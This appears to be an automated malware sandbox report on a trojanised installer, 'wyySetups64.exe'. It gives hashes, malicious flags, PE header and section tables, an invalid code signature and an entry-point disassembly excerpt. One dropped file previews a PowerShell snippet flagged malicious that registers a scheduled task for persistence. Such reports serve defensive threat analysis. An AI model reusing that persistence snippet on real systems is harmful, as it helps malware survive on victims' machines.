                                                                                                                                                                                                            Process:C:\Users\user\Downloads\360instpatch.exe
                                                                                                                                                                                                            File Type:PNG image data, 491 x 161, 8-bit colormap, non-interlaced
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1556
                                                                                                                                                                                                            Entropy (8bit):7.507131051649285
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:LZwmgblk3k44Yo4bo4Y4ofXQLo4LoXgMXI7gAgXILs/fHAnzPCpdyIIMGb34oYYI:OpO0P3nfXfX/HXPX/HXai+MGb34Z
                                                                                                                                                                                                            MD5:402C9D31E2079948E743562CB48AF2A6
                                                                                                                                                                                                            SHA1:5111E39A19E0675A44369E03D4A82132F0D12977
                                                                                                                                                                                                            SHA-256:D82DF7AFA80AB17CF1D298488C66902F192034B6BB18176F5BD5C5B74E348E79
                                                                                                                                                                                                            SHA-512:27510489FAA6562507CBDB0B5F545D9124D6BA59D41A65224DD6089A9C8331279CE83905B26D41453255BDA660FBAAE957E0E17D43350DFCB86603888177C760
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Users\user\Downloads\360instpatch.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1469440
                                                                                                                                                                                                            Entropy (8bit):6.242110984104102
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24576:l4LEubC/9euoUCi82BbjSyM5hGfzmzJHXW+U0:UEubUo1i3eymhGfizJHK0
                                                                                                                                                                                                            MD5:A2FF2C72E739E0CF4C73B623444CA39D
                                                                                                                                                                                                            SHA1:FF886E63C894A20F30C136A8264CFA33D41B8331
                                                                                                                                                                                                            SHA-256:C1EB83993C85E01EE6AE84EB6E05744FF8C3CCC02C41D09C22286E3012EF46FC
                                                                                                                                                                                                            SHA-512:844DAB35A1625D5BF1BD814A36FB80D5670D3DFEE5CF65AD8BE53784B486DCC08898B7577A323C7C7E1E83655F861EA86C5453CFA4C3D55353D329EF3AF6320B
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                            • Filename: A1FsbRkm5m.exe, Detection: malicious, Browse
                                                                                                                                                                                                            Process:C:\Users\user\Downloads\360instpatch.exe
                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1135682
                                                                                                                                                                                                            Entropy (8bit):7.510976265913228
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:Q0+G8ZYG6xrKI/ZFfg5Vfg5nfg53x3mYiJ6YJ6MJ6MEJl:QvGJxuI/bfQVfQnfQ3x3TUbhMl
                                                                                                                                                                                                            MD5:44C8DF596B52856EB1D3FE2E37CBDE4D
                                                                                                                                                                                                            SHA1:4AADBEEF9DC6CD4CCAC758EBDB852915C09545DF
                                                                                                                                                                                                            SHA-256:ECDDA2FB9EB27F1B56349E2ABFE90CE2F8741B982A3DD6D248E7D93E6B75DE2C
                                                                                                                                                                                                            SHA-512:EA94ED1662EFD2F6D91B4D05059DFADD8F290EEDBB45433E33F3B4E3729822A40E0C63D319F2041F3F1738650219200D594CED9E36B558AFF0A494FAB53A0E47
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Users\user\Downloads\360instpatch.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):28030
                                                                                                                                                                                                            Entropy (8bit):3.581114835224513
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:E4EuXYuiODQGYuBRrNRrQRrmRrXejXvXH5CeGTNxyqIYuyLmacwrvlCX4uH3OYqm:6nOT+bO7lU51EHWkGHr
                                                                                                                                                                                                            MD5:8074E9740A0E3CFDA172AD1983C72A05
                                                                                                                                                                                                            SHA1:B6D006ADAFF1FD059268517B6BD5610EF15D3BA9
                                                                                                                                                                                                            SHA-256:E4ED337A562AAC81005D451CFD4AEF721CF067ECBC6D1057601AEFC41EE83E26
                                                                                                                                                                                                            SHA-512:F6680CF19B512060B6ED1C0F88C8EE31A1BE456A37204CB63073E0AC58A2B0F544DCC0DABF0829F28687C2842043D21D41B2F172CB15698316EBF0F2BC89C445
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.t.h.e.m.e.s.>.......<.w.i.n.d.o.w.>.........<.d.e.f.a.u.l.t. .i.c.o.n._.p.o.i.n.t.=.".4.,.4.". .s.h.o.w._.i.c.o.n.=.".0.".>...........<.c.a.n.v.a.s. .n.o.r.m.a.l.=.".0.x.f.f.2.a.b.f.1.d.". .f.i.l.l.=.".0.". .i.m.a.g.e.=.".../.N.e.w.I.n.s.t.a.l.l.A.i.r./.s.k.i.n...p.n.g."./.>...........<.b.o.r.d.e.r. .n.o.r.m.a.l.=.".0.x.f.f.6.3.8.c.3.9.". .w.i.d.t.h.=.".1.". .i.n.n.e.r.=.".0.x.f.f.f.f.f.f.f.f."./.>...........<.f.o.n.t. .b.i.n.d._.f.o.n.t._.b.y._.l.a.n.g.u.a.g.e.=.".0.". .r.e.f.=.".". .f.a.c.e.=.".._o...,..[SO,.T.a.h.o.m.a.". .c.o.l.o.r.=.".0.x.0.0.b.5.e.5.1.3.". .s.i.z.e.=.".8.". .b.o.l.d.=.".0.". .i.t.a.l.i.c.=.".0.". .u.n.d.e.r.l.i.n.e.=.".0."./.>...........<.s.h.a.d.o.w. .b.o.r.d.e.r.=.".5.,.3.,.5.,.7.". .i.m.a.g.e.=.".../.N.e.w.I.n.s.t.a.l.l.A.i.r./.w.i.n.d.o.w._.s.h.a.d.o.w...p.n.g."./.>...........<.c.a.p.t.i.o.n. .s.h.o.w.=.".1.". .h.e.i.g.h.t.=.".3.0.". .c.o.l.o.r.=.".0.x.f.f.2.c.a.6.d.3."./.
                                                                                                                                                                                                            Process:C:\Users\user\Downloads\360instpatch.exe
                                                                                                                                                                                                            File Type:PNG image data, 604 x 380, 8-bit colormap, non-interlaced
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):14344
                                                                                                                                                                                                            Entropy (8bit):7.934027356242661
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:QTbAFSIp6FghLfaAEYlYifrkou/Z1DTn8O5zV7qh:QTkoIp68SW1Tk1Z1P8O5zch
                                                                                                                                                                                                            MD5:10AF715DFB97B8A187F81555C8E6068B
                                                                                                                                                                                                            SHA1:C108E08D53A6EC711F1BA70FDBD7561CE483CBCD
                                                                                                                                                                                                            SHA-256:EE7F804A1C73B6D6935FF731AE87AEFBBD1ABE16DC5FF315C5D8D91E283C902D
                                                                                                                                                                                                            SHA-512:FDCA596438FDD60C88DE69367ABC70D6CBFF318D8381EB4155FA257690F26D95C9A13131F676654BED27BE458A6DF67CBE1D713DE9826CF955723F6A92FC5BBB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Users\user\Downloads\360instpatch.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):704608
                                                                                                                                                                                                            Entropy (8bit):6.625840358726942
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:1IhyxJ3BYXF6WxYC2aeHACRYlH+ZOAyTjUnIgidGtAd8Rwb33+YnBsLS683wK9T7:ih8WxYCyYlaOYnliItjRwbH+YBsLS68N
                                                                                                                                                                                                            MD5:D875875EB3282B692AB10E946EA22361
                                                                                                                                                                                                            SHA1:34BCEF8A8CB0E1DB44671892AC3CBD74D3C541A8
                                                                                                                                                                                                            SHA-256:0ECA2E140F973B2011C633D4D92E512A1F77E1DA610CFE0F4538C0B451270016
                                                                                                                                                                                                            SHA-512:972466310D3C145141320584B5F3E431C6888BDA2BA1036F85E68E534ED6FB97BA04CBD46D8D9C401DC5857100DC1BFF1BAD82B50514F3E5C582522F22FD2B5C
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                            • Filename: A1FsbRkm5m.exe, Detection: malicious, Browse
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\wyySetups64.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):151
                                                                                                                                                                                                            Entropy (8bit):4.741657013789009
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:41Ai+PBoAwnLFsI2FIERMJyjqLWAfXIhS/ytIEFMEQVGdAn:4yi+5dwnLFsI2F5KJy0fXnMFFQhn
                                                                                                                                                                                                            MD5:AA0E1012D3B7C24FAD1BE4806756C2CF
                                                                                                                                                                                                            SHA1:FE0D130AF9105D9044FF3D657D1ABEAF0B750516
                                                                                                                                                                                                            SHA-256:FC47E1FA89397C3139D9047DC667531A9153A339F8E29AC713E518D51A995897
                                                                                                                                                                                                            SHA-512:15FAE192951747A0C71059F608700F88548F3E60BB5C708B206BF793A7E3D059A278F2058D4AC86B86781B202037401A29602EE4D6C0CBAAFF532CEF311975F4
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Preview:$xmlPath = "XML??".$taskName = "????".$xmlContent = Get-Content -Path $xmlPath | Out-String.Register-ScheduledTask -Xml $xmlContent -TaskName $taskName
                                                                                                                                                                                                            Process:C:\Users\user\Desktop\wyySetups64.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3213672
                                                                                                                                                                                                            Entropy (8bit):6.451509628158769
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:49152:xWutLBcXqFpBR6SVb8kq4pgquLMMji4NYxtJpkxhGjIHTbD333UKzl:HtLutqgwh4NYxtJpkxhGU333X
                                                                                                                                                                                                            MD5:97090426A42466D139D3E45F47C652F8
                                                                                                                                                                                                            SHA1:C3500A1E6DB48E87C2BA73BBB5CCC23EC31BBC2C
                                                                                                                                                                                                            SHA-256:E70179810F8C851E20966DA1E5E1BB45DFC603C068864192C43EB161CE7ABBD9
                                                                                                                                                                                                            SHA-512:BE792992521A9A618683C4CE3D55B984C607A8478A9889C38D87603B3CCF239E8715B005CB9D4CC7447B47DDE7740AC47971CBA0426B8F064F15D59DF035A632
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Process:C:\Users\user\Desktop\wyySetups64.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):26
                                                                                                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                            Process:C:\Users\user\Desktop\wyySetups64.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                            Size (bytes):4118496
                                                                                                                                                                                                            Entropy (8bit):7.743814085153487
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:98304:9lBo/r7J2a4FL8VdL0hvADfHraEk1qhJonrnYmIb:1oD7x4yVdDfLa8ky
                                                                                                                                                                                                            MD5:AAA0F14BDFE3777EEE342C27DE409E6D
                                                                                                                                                                                                            SHA1:6B5F9A7B71E6B105D1BFA26B0C7A4931ED9E5179
                                                                                                                                                                                                            SHA-256:B35314C2C3B1AAB777D621C6FD8516A877B27EFBDE4DD4ADDD6843C411E96AA3
                                                                                                                                                                                                            SHA-512:D584D30083E34964D846C88EB558DBA338E3B8982D6D71EFEC36461AEA12127CFCBA2BE9510D9EF254A85680A2BA2DDB21583CE5E77D5CF3AC0A65800E5AB25A
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):55
                                                                                                                                                                                                            Entropy (8bit):4.306461250274409
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                            Process:C:\Users\user\Desktop\wyySetups64.exe
                                                                                                                                                                                                            File Type:GLS_BINARY_LSB_FIRST
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4713
                                                                                                                                                                                                            Entropy (8bit):7.794126798189374
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:PXjz1tPmFxslSjesx2hbOW3Pp58i3uzodO38KYBZJI1nVq:PXjLPma2wFqeO33iJI1nVq
                                                                                                                                                                                                            MD5:2F4F4B30A5B098DE11AA26B6BDFF2ECC
                                                                                                                                                                                                            SHA1:4F2C267C7CEC2BB3B51DB53766B81FBEDD9DA615
                                                                                                                                                                                                            SHA-256:EDD1D1E873D4D9AFC4D0D60935F231AD65262D82DFBCBC15BCC89DC85ECD6E92
                                                                                                                                                                                                            SHA-512:07804C833ED0E175CCD6C239080974841C0864B46B36F40DDCF803EB814F4358FDD56216A98DA9ED548834A8D0FB30E5CD70BE94B4A0AB6583B7E7E76A340B80
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Entropy (8bit):6.451509628158769
                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 98.88%
                                                                                                                                                                                                            • Inno Setup installer (109748/4) 1.08%
                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                            File name:wyySetups64.exe
                                                                                                                                                                                                            File size:3'213'672 bytes
                                                                                                                                                                                                            MD5:97090426a42466d139d3e45f47c652f8
                                                                                                                                                                                                            SHA1:c3500a1e6db48e87c2ba73bbb5ccc23ec31bbc2c
                                                                                                                                                                                                            SHA256:e70179810f8c851e20966da1e5e1bb45dfc603c068864192c43eb161ce7abbd9
                                                                                                                                                                                                            SHA512:be792992521a9a618683c4ce3d55b984c607a8478a9889c38d87603b3ccf239e8715b005cb9d4cc7447b47dde7740ac47971cba0426b8f064f15d59df035a632
                                                                                                                                                                                                            SSDEEP:49152:xWutLBcXqFpBR6SVb8kq4pgquLMMji4NYxtJpkxhGjIHTbD333UKzl:HtLutqgwh4NYxtJpkxhGU333X
                                                                                                                                                                                                            TLSH:EBE54A27F28C713ED06B3A324A3386909837F66179168C6797FC794C8F365942A3E647
                                                                                                                                                                                                            Icon Hash:0c1733515131060c
                                                                                                                                                                                                            Entrypoint:0x6c6668
                                                                                                                                                                                                            Entrypoint Section:.itext
                                                                                                                                                                                                            Digitally signed:true
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                            Time Stamp:0x63ECF219 [Wed Feb 15 14:54:17 2023 UTC]
                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                            OS Version Major:6
                                                                                                                                                                                                            OS Version Minor:1
                                                                                                                                                                                                            File Version Major:6
                                                                                                                                                                                                            File Version Minor:1
                                                                                                                                                                                                            Subsystem Version Major:6
                                                                                                                                                                                                            Subsystem Version Minor:1
                                                                                                                                                                                                            Import Hash:8507116e3d0e7e02e36e7dc5b8aa1af8
                                                                                                                                                                                                            Signature Valid:false
                                                                                                                                                                                                            Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                                                                                                                                                                                                            Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                            Error Number:-2146869232
                                                                                                                                                                                                            Not Before, Not After
                                                                                                                                                                                                            • 06/05/2023 01:00:00 06/05/2026 00:59:59
                                                                                                                                                                                                            Subject Chain
                                                                                                                                                                                                            • CN=Johannes Schindelin, O=Johannes Schindelin, S=Nordrhein-Westfalen, C=DE
                                                                                                                                                                                                            Version:3
                                                                                                                                                                                                            Thumbprint MD5:0BDACC0E75B258864C6FFA046FF1F84A
                                                                                                                                                                                                            Thumbprint SHA-1:3EB14A3AEF84B7153E139397F0A49E2FAC662B0E
                                                                                                                                                                                                            Thumbprint SHA-256:637C86766A7FB03A8AF3B6D18E2F1183594BD60A75AFC1C36BA9AF46CE2A5A36
                                                                                                                                                                                                            Serial:7D467C5AC99420F6A7E2A89ED61472B4
                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                                            add esp, FFFFFFF0h
                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                            push esi
                                                                                                                                                                                                            push edi
                                                                                                                                                                                                            mov eax, 006BABB4h
                                                                                                                                                                                                            call 00007F976059AEA2h
                                                                                                                                                                                                            mov eax, dword ptr [006CFF3Ch]
                                                                                                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                                                                                                            mov eax, dword ptr [eax+00000188h]
                                                                                                                                                                                                            push FFFFFFECh
                                                                                                                                                                                                            push eax
                                                                                                                                                                                                            call 00007F976059F23Dh
                                                                                                                                                                                                            mov edx, dword ptr [006CFF3Ch]
                                                                                                                                                                                                            mov edx, dword ptr [edx]
                                                                                                                                                                                                            mov edx, dword ptr [edx+00000188h]
                                                                                                                                                                                                            and eax, FFFFFF7Fh
                                                                                                                                                                                                            push eax
                                                                                                                                                                                                            push FFFFFFECh
                                                                                                                                                                                                            push edx
                                                                                                                                                                                                            call 00007F976059F229h
                                                                                                                                                                                                            xor eax, eax
                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                            push 006C66F9h
                                                                                                                                                                                                            push dword ptr fs:[eax]
                                                                                                                                                                                                            mov dword ptr fs:[eax], esp
                                                                                                                                                                                                            push 00000001h
                                                                                                                                                                                                            call 00007F976059E584h
                                                                                                                                                                                                            call 00007F9760844BCBh
                                                                                                                                                                                                            mov eax, dword ptr [006BA7DCh]
                                                                                                                                                                                                            push eax
                                                                                                                                                                                                            push 006BA874h
                                                                                                                                                                                                            mov eax, dword ptr [006CFF3Ch]
                                                                                                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                                                                                                            call 00007F97607429F0h
                                                                                                                                                                                                            mov eax, 006B5454h
                                                                                                                                                                                                            mov edx, dword ptr [006CFDB4h]
                                                                                                                                                                                                            mov dword ptr [edx], eax
                                                                                                                                                                                                            call 00007F9760844C12h
                                                                                                                                                                                                            xor eax, eax
                                                                                                                                                                                                            pop edx
                                                                                                                                                                                                            pop ecx
                                                                                                                                                                                                            pop ecx
                                                                                                                                                                                                            mov dword ptr fs:[eax], edx
                                                                                                                                                                                                            jmp 00007F976085098Bh
                                                                                                                                                                                                            jmp 00007F97605937A7h
                                                                                                                                                                                                            call 00007F976084495Ah
                                                                                                                                                                                                            mov eax, 00000001h
                                                                                                                                                                                                            call 00007F9760594290h
                                                                                                                                                                                                            call 00007F9760593BEBh
                                                                                                                                                                                                            mov eax, dword ptr [006CFF3Ch]
                                                                                                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                                                                                                            mov edx, 006C688Ch
                                                                                                                                                                                                            call 00007F97607424BAh
                                                                                                                                                                                                            push 00000005h
                                                                                                                                                                                                            mov eax, dword ptr [006CFF3Ch]
                                                                                                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                                                                                                            mov eax, dword ptr [eax+00000188h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x2de000 | 0x97 | .edata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2d9000 | 0x39ba | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2e1000 | 0x3ad00 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x30dc00 | 0x2d68 | .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x2e0000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2d99f0 | 0x8c4 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x2dd000 | 0xbde | .didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2c20c8 | 0x2c2200 | 2022b8d5817cc1a013b6f7be724426be | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0x2c4000 | 0x2898 | 0x2a00 | 14817d9596460398ce8a10ec41885658 | False | 0.5013950892857143 | data | 6.097600196485659 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x2c7000 | 0x9258 | 0x9400 | b6c68a9cc08d787f829bebe13beeebce | False | 0.576198268581081 | data | 6.2228077637398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0x2d1000 | 0x790c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x2d9000 | 0x39ba | 0x3a00 | 1c7fac207b7708f2d38f3eced48727dc | False | 0.3355334051724138 | data | 5.289106478125697 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata | 0x2dd000 | 0xbde | 0xc00 | 022cbd8e7ebbfb3df44dfd43f92fa718 | False | 0.3512369791666667 | data | 4.391276161587863 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata | 0x2de000 | 0x97 | 0x200 | 29372b5d9fa8b5b431a37756aee4c5b7 | False | 0.25 | data | 1.8458344781090077 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls | 0x2df000 | 0x4c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x2e0000 | 0x5d | 0x200 | 0e147eb88402eb8a56f168b457309291 | False | 0.189453125 | data | 1.3507743158343073 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x2e1000 | 0x3ad00 | 0x3ae00 | 32a06d163194b2d3bf155f7a452b4065 | False | 0.46382779325902335 | data | 6.14802530245256 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x2e2320 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
RT_CURSOR | 0x2e2454 | 0x134 | data | English | United States | 0.4642857142857143
RT_CURSOR | 0x2e2588 | 0x134 | data | English | United States | 0.4805194805194805
RT_CURSOR | 0x2e26bc | 0x134 | data | English | United States | 0.38311688311688313
RT_CURSOR | 0x2e27f0 | 0x134 | data | English | United States | 0.36038961038961037
RT_CURSOR | 0x2e2924 | 0x134 | data | English | United States | 0.4090909090909091
RT_CURSOR | 0x2e2a58 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
RT_ICON | 0x2e2b8c | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.04227680680207841
RT_ICON | 0x2e6db4 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.07157676348547717
RT_ICON | 0x2e935c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.08794559099437148
RT_ICON | 0x2ea404 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.11891828058573453
RT_ICON | 0x2ee62c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.1578838174273859
RT_ICON | 0x2f0bd4 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.010333018422295701
RT_ICON | 0x2f4dfc | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.026763485477178422
RT_ICON | 0x2f73a4 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.02626641651031895
RT_ICON | 0x2f844c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.15806754221388367
RT_ICON | 0x2f94f4 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.27172131147540984
RT_ICON | 0x2f9e7c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.350177304964539
RT_ICON | 0x2fa2e4 | 0x217 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | English | United States | 1.0205607476635514
RT_ICON | 0x2fa4fc | 0x2ff | PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced | English | United States | 1.014341590612777
RT_ICON | 0x2fa7fc | 0x35c | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | English | United States | 1.0127906976744185
RT_ICON | 0x2fab58 | 0x4ca | PNG image data, 28 x 28, 8-bit/color RGBA, non-interlaced | English | United States | 1.0089722675367048
RT_ICON | 0x2fb024 | 0x3fa | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | English | United States | 1.0108055009823183
RT_ICON | 0x2fb420 | 0x577 | PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced | English | United States | 1.0078627591136526
RT_ICON | 0x2fb998 | 0x5f8 | PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced | English | United States | 1.007198952879581
RT_ICON | 0x2fbf90 | 0x99c | PNG image data, 56 x 56, 8-bit/color RGBA, non-interlaced | English | United States | 1.004471544715447
RT_ICON | 0x2fc92c | 0xaf8 | PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced | English | United States | 1.003917378917379
